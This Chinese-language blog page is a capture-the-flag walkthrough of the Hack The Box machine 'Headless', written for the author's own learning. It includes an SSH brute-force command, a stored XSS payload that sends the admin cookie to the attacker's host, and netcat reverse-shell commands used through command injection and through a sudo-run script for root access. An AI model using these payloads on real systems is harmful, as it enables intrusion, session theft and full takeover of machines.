

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/cat.jpg">
  <link rel="icon" href="/img/cat.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Backk0m">
  <meta name="keywords" content="">
  
    <meta name="description" content="写在前面，文章中的大多数内容在网上可以找到，我是为了在记录总结中学习，故此写下这篇文章 首先我们先用nmap扫描目标开放的端口和服务 12345678910111213141516171819202122232425┌──(root㉿kali)-[&#x2F;home&#x2F;kali&#x2F;桌面]└─# nmap -p- --min-rate 1000 10.10.11.8    Starting Nmap 7.94S">
<meta property="og:type" content="article">
<meta property="og:title" content="Headless(HTB)">
<meta property="og:url" content="http://backk0m.github.io/2024/05/27/Headless-HTB/index.html">
<meta property="og:site_name" content="Backk0m&#39;s Blog">
<meta property="og:description" content="写在前面，文章中的大多数内容在网上可以找到，我是为了在记录总结中学习，故此写下这篇文章 首先我们先用nmap扫描目标开放的端口和服务 12345678910111213141516171819202122232425┌──(root㉿kali)-[&#x2F;home&#x2F;kali&#x2F;桌面]└─# nmap -p- --min-rate 1000 10.10.11.8    Starting Nmap 7.94S">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/backk0m/image-bed/135.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/backk0m/image-bed/154.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/backk0m/image-bed/155.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/backk0m/image-bed/156.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/backk0m/image-bed/157.png">
<meta property="article:published_time" content="2024-05-27T13:28:16.000Z">
<meta property="article:modified_time" content="2024-05-29T12:20:21.134Z">
<meta property="article:author" content="Backk0m">
<meta property="article:tag" content="HTB">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/backk0m/image-bed/135.png">
  
  
  
  <title>Headless(HTB) - Backk0m&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"backk0m.github.io","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"left","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.1.1"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Headless(HTB)"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-05-27 21:28" pubdate>
          2024年5月27日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          752 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          7 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="padding-left: 2rem; margin-right: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Headless(HTB)</h1>
            
            
              <div class="markdown-body">
                
                <p>写在前面，文章中的大多数内容在网上可以找到，我是为了在记录总结中学习，故此写下这篇文章</p>
<p>首先我们先用nmap扫描目标开放的端口和服务</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs vim">┌──(root㉿kali)-[/home/kali/桌面]<br>└─# <span class="hljs-keyword">nmap</span> -<span class="hljs-keyword">p</span>- --<span class="hljs-built_in">min</span>-rate <span class="hljs-number">1000</span> <span class="hljs-number">10.10</span>.<span class="hljs-number">11.8</span>    <br>Starting Nmap <span class="hljs-number">7.94</span>SVN ( https://<span class="hljs-keyword">nmap</span>.org ) at <span class="hljs-number">2024</span>-<span class="hljs-number">05</span>-<span class="hljs-number">27</span> <span class="hljs-number">01</span>:<span class="hljs-number">06</span> EDT<br>Nmap scan report <span class="hljs-keyword">for</span> <span class="hljs-number">10.10</span>.<span class="hljs-number">11.8</span> (<span class="hljs-number">10.10</span>.<span class="hljs-number">11.8</span>)<br>Host <span class="hljs-keyword">is</span> <span class="hljs-keyword">up</span> (<span class="hljs-number">0.89</span>s latency).<br>Not shown: <span class="hljs-number">65533</span> closed tcp ports (reset)<br>PORT     STATE SERVICE<br><span class="hljs-number">22</span>/tcp   <span class="hljs-keyword">open</span>  ssh<br><span class="hljs-number">5000</span>/tcp <span class="hljs-keyword">open</span>  upnp<br><br>Nmap done: <span class="hljs-number">1</span> IP address (<span class="hljs-number">1</span> host <span class="hljs-keyword">up</span>) scanned in <span class="hljs-number">119.49</span> seconds<br>                                                                                                                                  <br>┌──(root㉿kali)-[/home/kali/桌面]<br>└─# <span class="hljs-keyword">nmap</span> -sT -sV -sC -O -p22,<span class="hljs-number">5000</span> <span class="hljs-number">10.10</span>.<span class="hljs-number">11.8</span><br>Starting Nmap <span class="hljs-number">7.94</span>SVN ( https://<span class="hljs-keyword">nmap</span>.org ) at <span class="hljs-number">2024</span>-<span class="hljs-number">05</span>-<span class="hljs-number">27</span> <span class="hljs-number">01</span>:<span class="hljs-number">09</span> EDT<br>Nmap scan report <span class="hljs-keyword">for</span> <span class="hljs-number">10.10</span>.<span class="hljs-number">11.8</span> (<span class="hljs-number">10.10</span>.<span class="hljs-number">11.8</span>)<br>Host <span class="hljs-keyword">is</span> <span class="hljs-keyword">up</span> (<span class="hljs-number">0.54</span>s latency).<br><br>PORT     STATE SERVICE VERSION<br><span class="hljs-number">22</span>/tcp   <span class="hljs-keyword">open</span>  ssh     OpenSSH <span class="hljs-number">9.2</span>p1 Debian <span class="hljs-number">2</span>+deb12u2 (protocol <span class="hljs-number">2.0</span>)<br>| ssh-hostkey: <br>|   <span class="hljs-number">256</span> <span class="hljs-number">90</span>:<span class="hljs-number">02</span>:<span class="hljs-number">94</span>:<span class="hljs-number">28</span>:<span class="hljs-number">3</span>d:<span class="hljs-keyword">a</span><span class="hljs-variable">b:22</span>:<span class="hljs-number">74</span>:df:<span class="hljs-number">0</span><span class="hljs-keyword">e</span>:a3:b2:<span class="hljs-number">0</span><span class="hljs-keyword">f</span>:<span class="hljs-number">2</span><span class="hljs-variable">b:c6</span>:<span class="hljs-number">17</span> (ECDSA)<br>|_  <span class="hljs-number">256</span> <span class="hljs-number">2</span><span class="hljs-keyword">e</span>:b9:<span class="hljs-number">08</span>:<span class="hljs-number">24</span>:<span class="hljs-number">02</span>:<span class="hljs-number">1</span><span class="hljs-variable">b:60</span>:<span class="hljs-number">94</span>:<span class="hljs-number">60</span>:b3:<span class="hljs-number">84</span>:a9:<span class="hljs-number">9</span><span class="hljs-keyword">e</span>:<span class="hljs-number">1</span><span class="hljs-variable">a:60</span>:<span class="hljs-keyword">ca</span> (ED25519)<br><span class="hljs-number">5000</span>/tcp <span class="hljs-keyword">open</span>  upnp?<br>| fingerprint-strings:<br></code></pre></td></tr></table></figure>

<p>我们可以看到开放了22号端口，和5000端口</p>
<p>可以考虑爆破和扫描目录</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">hydra -l root -P <span class="hljs-regexp">/home/</span>kali<span class="hljs-regexp">/桌面/</span>passwd.txt <span class="hljs-number">10.10</span>.<span class="hljs-number">11.8</span> ssh -V  <span class="hljs-comment">#爆破ssh登录密码</span><br></code></pre></td></tr></table></figure>

<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">ssh</span> root@<span class="hljs-number">192.168.1.10</span><br></code></pre></td></tr></table></figure>

<p>没有爆破出来</p>
<p>我们扫描目录发现</p>
<p><img src="https://cdn.jsdelivr.net/gh/backk0m/image-bed/135.png" srcset="/img/loading.gif" lazyload></p>
<p>访问 <code>/support</code> 返回是一个表单在message中进行xss操作会返回 <code>Hacking Attempt Detected</code></p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">Hacking</span> Attempt Detected<br><br><span class="hljs-attribute">Your</span> IP address has been flagged, a report with your browser information has been sent to the administrators for investigation.<br><br><span class="hljs-attribute">Client</span> Request Information:<br><br><span class="hljs-attribute">Method</span>: POST<br><span class="hljs-attribute">URL</span>: http://<span class="hljs-number">10.10.11.8:5000</span>/support<br><span class="hljs-attribute">Headers</span>: Host: <span class="hljs-number">10.10.11.8:5000</span><br><span class="hljs-attribute">User</span>-Agent: Mozilla/<span class="hljs-number">5</span>.<span class="hljs-number">0</span> (X11; Linux x86_64; rv:<span class="hljs-number">109</span>.<span class="hljs-number">0</span>) Gecko/<span class="hljs-number">20100101</span> Firefox/<span class="hljs-number">115</span>.<span class="hljs-number">0</span><br><span class="hljs-attribute">Accept</span>: text/html,application/xhtml+xml,application/xml;q=<span class="hljs-number">0</span>.<span class="hljs-number">9</span>,image/avif,image/webp,*/*;q=<span class="hljs-number">0</span>.<span class="hljs-number">8</span><br><span class="hljs-attribute">Accept</span>-Language: en-US,en;q=<span class="hljs-number">0</span>.<span class="hljs-number">5</span><br><span class="hljs-attribute">Accept</span>-Encoding: gzip, deflate<br><span class="hljs-attribute">Content</span>-Type: application/x-www-form-urlencoded<br><span class="hljs-attribute">Content</span>-Length: <span class="hljs-number">117</span><br><span class="hljs-attribute">Origin</span>: http://<span class="hljs-number">10.10.11.8:5000</span><br><span class="hljs-attribute">Connection</span>: keep-alive<br><span class="hljs-attribute">Referer</span>: http://<span class="hljs-number">10.10.11.8:5000</span>/support<br><span class="hljs-attribute">Cookie</span>: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs<br><span class="hljs-attribute">Upgrade</span>-Insecure-Requests: <span class="hljs-number">1</span><br></code></pre></td></tr></table></figure>

<p>由于我们知道我们的用户代理标头正在被记录，因此我们可以尝试在日志中存储 xxs 有效负载。有效负载存储在服务器上的日志中，然后在管理员查看日志时执行。窃取is_admin cookie。然后访问 <code>/dashboard</code>  </p>
<p><img src="https://cdn.jsdelivr.net/gh/backk0m/image-bed/154.png" srcset="/img/loading.gif" lazyload></p>
<p>cookie窃取参考资料：  <a target="_blank" rel="noopener" href="https://pswalia2u.medium.com/exploiting-xss-stealing-cookies-csrf-2325ec03136e">https://pswalia2u.medium.com/exploiting-xss-stealing-cookies-csrf-2325ec03136e</a></p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="language-javascript"><span class="hljs-variable language_">document</span>.<span class="hljs-property">location</span>=<span class="hljs-string">&#x27;http://10.10.16.26:5566/?cookie=&#x27;</span>+<span class="hljs-variable language_">document</span>.<span class="hljs-property">cookie</span></span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>本机</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">python3</span> -m http.server <span class="hljs-number">80</span><br></code></pre></td></tr></table></figure>

<figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs accesslog">Serving HTTP on <span class="hljs-number">0</span>.<span class="hljs-number">0</span>.<span class="hljs-number">0</span>.<span class="hljs-number">0</span> port <span class="hljs-number">80</span> (http://<span class="hljs-number">0</span>.<span class="hljs-number">0</span>.<span class="hljs-number">0</span>.<span class="hljs-number">0</span>:<span class="hljs-number">80</span>/) ...<br><span class="hljs-number">10.10.11.8</span> - - <span class="hljs-string">[27/May/2024 03:22:50]</span> <span class="hljs-string">&quot;<span class="hljs-keyword">GET</span> /?cookie=is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0 </span><br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/backk0m/image-bed/155.png" srcset="/img/loading.gif" lazyload></p>
<p>我们拿到管理员的cookie后，可以访问 <code>/dashboard</code> 抓包发现有一个时间的参数  <code>；</code> <code> &amp;&amp;</code> 执行两条命令</p>
<p>我们采用   <code>nc -e /bin/bash 10.10.16.26 9001</code> 反弹shell</p>
<p>我们拿到的是用户dvir</p>
<p>提权</p>
<p>使用命令 sudo -l 列出当前用户被授权执行的命令清单的命令  (通常情况下，只有具有root权限的用户才能执行 <code>sudo -l</code> 命令,其他用户使用命令，需要系统管理员明确地在 sudoers 文件中配置相应的权限)</p>
<p><img src="https://cdn.jsdelivr.net/gh/backk0m/image-bed/156.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://cdn.jsdelivr.net/gh/backk0m/image-bed/157.png" srcset="/img/loading.gif" lazyload></p>
<p>弄清楚我们可以使用 root 权限运行什么。这是一个简单的脚本，它将调用用户可访问的二进制文件-&gt; &#x2F;initdb.sh</p>
<p>因为我们可以编辑该二进制文件，所以我们只需在那里插入另一个 shell。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">echo</span>  <span class="hljs-string">&quot;nc -e /bin/sh 10.10.16.26 9002&quot;</span> &gt; initdb.sh<br><span class="hljs-built_in">chmod</span> +x initdb.sh<br>sudo /usr/bin/syscheck<br></code></pre></td></tr></table></figure>

<p>我们可以在攻击者的机器上启动另一个监听器，在使用 sudo 执行 syscheck 函数后，我们就得到了反向 root shell。</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/HTB/" class="print-no-link">#HTB</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Headless(HTB)</div>
      <div>http://backk0m.github.io/2024/05/27/Headless-HTB/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Backk0m</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年5月27日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/06/01/Linux%E6%8F%90%E6%9D%83/" title="Linux提权">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Linux提权</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/02/12/PHP%20GC%E5%9E%83%E5%9C%BE%E5%9B%9E%E6%94%B6%E6%9C%BA%E5%88%B6/" title="PHP GC垃圾回收机制">
                        <span class="hidden-mobile">PHP GC垃圾回收机制</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
